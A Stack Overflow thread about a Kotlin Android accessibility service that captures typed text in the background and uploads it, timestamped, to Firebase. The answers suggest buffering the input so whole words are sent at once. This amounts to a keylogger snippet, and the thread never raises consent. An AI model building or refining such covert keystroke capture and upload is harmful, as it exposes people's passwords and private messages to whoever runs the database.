# How to send data from keyboard to Firebase using accessibility data service using Kotlin in android

Tags: android, firebase, kotlin, firebase-realtime-database, accessibilityservice

I have a class AccessibilityDataService and when there is a certain event starts an activity

When onAccessibilityEvent is called it takes data and sends data to the interactor(in the code below)
I use AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED

It's taking data line by line and sends it to the interactor but I want the whole data to be sent at once:

```
@Inject lateinit var interactor: InteractorAccessibilityData

override fun onAccessibilityEvent(event: AccessibilityEvent) {

        when (event.eventType) {

            AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED -> {
                val data = event.text.toString()
                if (data != "[]") {
                    interactor.setDataKey("${getDateTime()} |(TEXT)| $data")
                    Log.i(TAG, "${getDateTime()} |(TEXT)| $data")

                }
            }
        }

    }
```

and code for interactor is here:

```
override fun setDataKey(data: String) {
        if (firebase.getUser()!=null) firebase.getDatabaseReference(KEYS).child(DATA).push().child(TEXT).setValue(data)
    }
```

and the data saved in Firbase is like -> This is how data looks in firebase :
[Image](https://i.stack.imgur.com/k3ppC.png)

But I want that data in only this form -> This is how I want data in Firebase:
[Image](https://i.stack.imgur.com/lzuYV.png)

Comment: What exactly in this code doesn't work the way you expect?
Tell us what is wrong with shared code. Do you have any errors?

Comment: My code send text data to firebase one by one in this way (https://i.stack.imgur.com/k3ppC.png) ...But I don't want this
I want the data to be sent in firebase in this way (https://i.stack.imgur.com/lzuYV.png)

Comment: I'm sorry but I cannot see any difference. Can please be more specific?

Comment: My code uses AccessibilityEvent TYPE_VIEW_TEXT_CHANGED  this takes the typed word from the keyboard, for example, Assume you're typing your name & if you type (A)  it send (A) to firebase ...... and AccessibilityEvent send data when text is changed i.e when you type (L) it send previous word and new word which is (AL) shown in the image which can Increase read-write of my database what I want is When the user finished his typing after that the whole line text or word should be sent.  should I be more specific?  (See the both images please)

Comment: My code sends data one by one If I type the name ALEX but data in my firebase will be like 1. A  2. AL  3.ALE  4.  ALEX  it can increase read-write in firebase database I want full text to send to firebase  4. ALEX  please help and see mentioned screenshots please comment if not understanding.

Answer (score 0):

The [onAccessibilityEvent(AccessibilityEvent event)](https://developer.android.com/reference/android/accessibilityservice/AccessibilityService#onAccessibilityEvent(android.view.accessibility.AccessibilityEvent)) method is triggered any time an "event" takes place. If the event is of type [TYPE_VIEW_TEXT_CHANGED](https://developer.android.com/reference/android/view/accessibility/AccessibilityEvent#TYPE_VIEW_TEXT_CHANGED), it means that it:

> Represents the event of changing the text of an EditText.

So every time you change the content of the EditText by typing a new character, this method fires, in terms it calls "setDataKey()", which actually writes the newly typed character to the database. That's the reason why you have a record in the database for each and every character you type.

If you want to have a single record that contains all the data that you have typed in the EditText, then you should add a button, attach a click listener, on once the button is clicked, get the content of the EditText and write it to Firebase. There is no need to listen for changes.

Comment: Yes Your answer is really helpful but my service runs in background, is there anyway to do it without button because it's background service. please find anyway

Comment: I accept it . Please share any other way because this Service runs in background that's why I can't use any button

Comment: The whole idea behind this approach is **not** to track each event that happens in the EditText, but just to take an action only when the user finishes typing.

Comment: Yes that's Exactly what I want

Comment: Most likely you should give it a try to an [Android Background service](https://developer.android.com/topic/libraries/architecture/workmanager) called WorkManager.  So I recommend try it in code, and if you have hard times implementing it, please post a new question using its own [MCVE](https://stackoverflow.com/help/mcve), so I and other Firebase developers can help you.

Comment: Hi. Is there everything alright? Can I help you with other information?

Comment: Yes please share what you've got I want to solve this I will share necessary code files if you need

Comment: I think you misunderstand the whole concept of Stack Overflow, which **isn't** a code writing service. So you should make your own attempt, given the information in the answer, and ask another question if something else comes up. Note, that I and other Firebase developers are more than willing to help you with your existing code.

Comment: Please take a moment and do the right thing. Thanks.

Answer (score 0):

Maybe try storing the inputs in a variable and send it to firebase ONLY when next interaction takes place, for example: EditText is not focused or when some button is pressed - only then send the string from variable to firebase
I don't know, I'm just trying to use some logic

Something like this probably ->

```
var tempData: String

if (data != "[]") {

tempData = tempData + data

Log.i(TAG, "${getDateTime()} |(TEXT)| $temData")}
```

put your `interactor.setDataKey("${getDateTime()} |(TEXT)| $data")`
out of the `If`
and after user clicks some button or stop focusing EditText, then add your

```
data = tempData

interactor.setDataKey("${getDateTime()} |(TEXT)| $data")
```

Or, in your case, keep storing data to variable and send data to firebase after 1 minute of interaction with keyboard or if "enter" is pressed (if it's possible), it's not perfect, but it will look better then t.th.thi.this

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Comment: I have tried that thankyou